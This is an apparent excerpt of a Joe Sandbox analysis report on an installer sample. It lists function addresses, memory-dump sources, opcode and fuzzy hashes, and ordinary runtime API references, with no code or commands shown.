                            • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                            • Instruction ID: f951792fbeb76cf3b87c749f3cb711a7fc6bf4a077466ae97c81b3f1d636c5e5
                            • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                            • Instruction Fuzzy Hash: 2351A076F016099BDB08CF98DD916EEBBF1EB88308F28916ED011E7781E7749A41CB50
                            Function 6CE0B06F Relevance: .2, Instructions: 155COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9302b36b025ec877457fbbf1a21bafb2f45ab16812df500e0537ae03573401d4
                            • Instruction ID: b074aff1c6cac03b7f9cc50b6e3a79699cd00d9c986fd3b9e9453667836c6a3b
                            • Opcode Fuzzy Hash: 9302b36b025ec877457fbbf1a21bafb2f45ab16812df500e0537ae03573401d4
                            • Instruction Fuzzy Hash: 2351383550D7068BC314DF6CE8409EAB3A2AFC5320F618B3EE495CB8D1EB75552ACB46
                            Function 6CC85EC9 Relevance: .1, Instructions: 136COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                            • Instruction ID: 91812b8e4bf2eb690fb1ecd2ec38c62f2c9da98db30b18b3913e9f4c4d955b4e
                            • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                            • Instruction Fuzzy Hash: 363114277A540103D70CCD3BCC1279FA5575BD422A75ECF396C06CEF55E56CC8124154
                            Function 6CDBCB30 Relevance: .1, Instructions: 118COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 785d6b9a47eeccde5a6ebbf50bfb0f25ce1a7cd1602a9f58dfb5d8ec8732bbf1
                            • Instruction ID: b59e37270f07948b98343a3aef8e25496da7f99f8252e98974a27f25fa6bec28
                            • Opcode Fuzzy Hash: 785d6b9a47eeccde5a6ebbf50bfb0f25ce1a7cd1602a9f58dfb5d8ec8732bbf1
                            • Instruction Fuzzy Hash: DF41AD72A4871A8FC304DE58EC804FBB3A6EFC9310F904B3D9966971D5D771691AC390
                            Function 6CE18D12 Relevance: .1, Instructions: 97COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 098c659f76e41217d8669f6238bf7423f4d33ff929d6c702424d2a71048e67eb
                            • Instruction ID: 2eea17289decfe09bd3c7d3a450e58a317f2b583a079d770edffe415d4196c38
                            • Opcode Fuzzy Hash: 098c659f76e41217d8669f6238bf7423f4d33ff929d6c702424d2a71048e67eb
                            • Instruction Fuzzy Hash: 1A317A31A147228BD728DB39D4500ABB3E7EFC5318B64CB3DC4568B599EB75601BCB82
                            Function 6CD0C700 Relevance: .1, Instructions: 70COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                            • Instruction ID: 7f52df8e80e9e3b72515843adf5c3179305a079526c616188eb43997fc4d7086
                            • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                            • Instruction Fuzzy Hash: B9219077320A0647E74C8A38D83737532D0A745318F98A22DEA6BCE2C2D77AC457C385
                            Function 6CC4D456 Relevance: .0, Instructions: 29COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 65f79bf586b3d5e214906b24c13f7ae44cbd7a2d5e97e3e55d0da51a767a9fd7
                            • Instruction ID: 5c9de3322bebddbe346eb05ed38a51af9f3e0569c811436343a77bcd54cea0ba
                            • Opcode Fuzzy Hash: 65f79bf586b3d5e214906b24c13f7ae44cbd7a2d5e97e3e55d0da51a767a9fd7
                            • Instruction Fuzzy Hash: 7EF0A031A142209BCB12DB49C805B8973BCEB45BA8F11D097F501DBA40D2B0ED40C7D0
                            Function 6CC4D425 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                            • Instruction ID: e013d62955d731a68c7c796bebb4ee905c284937d87871b187e1b9abb04eab05
                            • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                            • Instruction Fuzzy Hash: F4E08C32912238EBCB10DB88C904D8AF3ECEB85B14B1190A6F505D3A00E270EE00C7D0
                            Function 6CD0A700 Relevance: .0, Instructions: 13COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                            • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                            • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                            • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                            Function 6CCA1B50 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 341COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                            • API String ID: 3519838083-609671
                            • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction ID: c61d36a671096d47f88a2c87ac744b09336f64855a884e6dd0fc8453e47b1d23
                            • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                            • Instruction Fuzzy Hash: 39D1AF71A0424ADFCF01CFE9D988AEEB7B5FF09318F244559E055A3A50EB70D94ACB60
                            Function 6CC89798 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 461COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv$H_prolog
                            • String ID: >WJ$x$x
                            • API String ID: 2300968129-3162267903
                            • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction ID: c2709ef9f3f9fb8449dcb2e7778dd303fd9ffad487f3c405946c219bc2cb4b7e
                            • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction Fuzzy Hash: 0C126C71901209EFDF10DFA9C880AEEBBB5FF4931CF248169E819A7A50E7359985CF50
                            Function 6CC3D1C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                            Download Yara Rule
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 6CC3D1F7
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6CC3D1FF
                            • _ValidateLocalCookies.LIBCMT ref: 6CC3D288
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6CC3D2B3
                            • _ValidateLocalCookies.LIBCMT ref: 6CC3D308
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 964c31bc7aeb05583db0b690e73ad9674ec50b0d29f065cf3bfde52d6526d5c0
                            • Instruction ID: 007a906120d556d086040ad75da707fd1ccc24eed4722632b7b53670f5a23d41
                            • Opcode Fuzzy Hash: 964c31bc7aeb05583db0b690e73ad9674ec50b0d29f065cf3bfde52d6526d5c0
                            • Instruction Fuzzy Hash: A041C634A112289BCF00CF69D840ADE7BB5BF45328F14C155E82C9B751E732DE56CB94
                            Function 6CC4A58A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 0-537541572
                            • Opcode ID: 79cc3715e047a7332a904a658baaf1fa222caaa413831ea6c6792a67d40ee316
                            • Instruction ID: 62d1ac923823adedc43b87a5f718af3a269717d1723734b35b24c06a5bb208a7
                            • Opcode Fuzzy Hash: 79cc3715e047a7332a904a658baaf1fa222caaa413831ea6c6792a67d40ee316
                            • Instruction Fuzzy Hash: DC21BB71E05621FBDB114A6B8D44E9A37B8AB92768F15C635EC15A7680F630DC01C7E4
                            Function 6CC4F5A1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetConsoleCP.KERNEL32(?,6CC4E7C0,?), ref: 6CC4F5E9
                            • __fassign.LIBCMT ref: 6CC4F7C8
                            • __fassign.LIBCMT ref: 6CC4F7E5
                            • WriteFile.KERNEL32(?,6CC591A6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC4F82D
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CC4F86D
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC4F919
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ConsoleErrorLast
                            • String ID:
                            • API String ID: 4031098158-0
                            • Opcode ID: 499836fdbd8076cce5712ef9c9f412e1155e5c6087774991fe22c313878e742d
                            • Instruction ID: e44be86819968e4a106ee2e6d8ac041ecf368940f8043960fc0b1c2253045c05
                            • Opcode Fuzzy Hash: 499836fdbd8076cce5712ef9c9f412e1155e5c6087774991fe22c313878e742d
                            • Instruction Fuzzy Hash: 12D1AA75E012589FDF15CFA8C8809EDBBB5FF0A314F28856AE855BB341E730A946CB50
                            Function 6CB02F60 Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                            Download Yara Rule
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CB02F95
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CB02FAF
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CB02FD0
                            • __Getctype.LIBCPMT ref: 6CB03084
                            • std::_Facet_Register.LIBCPMT ref: 6CB0309C
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CB030B7
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                            • String ID:
                            • API String ID: 1102183713-0
                            • Opcode ID: 1fb60fa32bde6d355e4c0caeb4c72be5e15199b7f3876bf8cb8df6ab565a2ea1
                            • Instruction ID: 64f8c4db67d6f671b099d22c7704d2efad95b9b4364921fbf2c38d207b098da6
                            • Opcode Fuzzy Hash: 1fb60fa32bde6d355e4c0caeb4c72be5e15199b7f3876bf8cb8df6ab565a2ea1
                            • Instruction Fuzzy Hash: 704179B1E00658CFDF10DF84D958B9EBBB4FF45718F054118D819ABB40E774A904CBA1
                            Function 6CC77FA6 Relevance: 9.1, APIs: 6, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv$__aullrem
                            • String ID:
                            • API String ID: 2022606265-0
                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction ID: 6639595d585b05a5ea1274370638b6a69677bbbaf678cf421e6ea77665d45f09
                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction Fuzzy Hash: 1F21A530641219FEDF208FA98C44DDF7E69EF417E8F208226B628716E4E2718D51D771
                            Function 6CC7D6EC Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 183COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC7D6F1
                              • Part of subcall function 6CC8C173: __EH_prolog.LIBCMT ref: 6CC8C178
                            • __EH_prolog.LIBCMT ref: 6CC7D8F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: IJ$WIJ$J
                            • API String ID: 3519838083-740443243
                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction ID: b61e15951186151bd578caea64ef484842d544ea23cd4273908047dba709b642
                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction Fuzzy Hash: 5D71A130900255DFDB24DFA4C484BEDBBF4FF19308F1084A9D8556BB91EB74AA49CBA1
                            Function 6CC590FD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 132fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • _free.LIBCMT ref: 6CC591CD
                            • _free.LIBCMT ref: 6CC591F6
                            • SetEndOfFile.KERNEL32(00000000,6CC57DDC,00000000,6CC4E7C0,?,?,?,?,?,?,?,6CC57DDC,6CC4E7C0,00000000), ref: 6CC59228
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC57DDC,6CC4E7C0,00000000,?,?,?,?,00000000,?), ref: 6CC59244
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1976531494.000000006CAB1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAB0000, based on PE: true
                            • Associated: 00000006.00000002.1976510447.000000006CAB0000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1977915832.000000006CC5B000.00000002.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1980048915.000000006CE27000.00000002.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _free$ErrorFileLast
                            • String ID: 8Q
                            • API String ID: 1547350101-4022487301
                            • Opcode ID: 95b0afdcafca3c06923e76d6f5e703ce0a8410abae412603a253c05c6098ede6
                            • Instruction ID: cab272011a43ec4001f4fea4943cb727e736090804592bf1144713584f3b0778
                            • Opcode Fuzzy Hash: 95b0afdcafca3c06923e76d6f5e703ce0a8410abae412603a253c05c6098ede6
                            • Instruction Fuzzy Hash: 8F411CB29006059ADB019BA5CC04BCE3B75EF85334F548684E824E7B90FB30C4774769
                            Function 6CC91418 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 6CC9141D
                              • Part of subcall function 6CC91E40: __EH_prolog.LIBCMT ref: 6CC91E45
                              • Part of subcall function 6CC918EB: __EH_prolog.LIBCMT ref: 6CC918F0
                              • Part of subcall function 6CC91593: __EH_prolog.LIBCMT ref: 6CC91598
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: &qB$0aJ$A0$XqB
                            • API String ID: 3519838083-1326096578
                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction ID: f39451af031fb9180ed0492a268511ec3ebb0768e174097d196b6928da86e470
                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction Fuzzy Hash: 8C219F71D01248AECF04DBE5DA959EDBBB4AF25308F20402DD41237B80EB785E0CCB61
                            Function 6CC91234 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1978007489.000000006CC6B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC6B000, based on PE: true
                            • Associated: 00000006.00000002.1979008430.000000006CD36000.00000004.00000001.01000000.00000009.sdmpDownload File
                            • Associated: 00000006.00000002.1979104758.000000006CD3C000.00000020.00000001.01000000.00000009.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6cab0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: J$0J$DJ$`J
                            • API String ID: 3519838083-2453737217
                            • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                            • Instruction ID: 83bb3aa312b4b82a2d1876fe3746787747b37e5b08934884c1513b0e480f25e8
                            • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
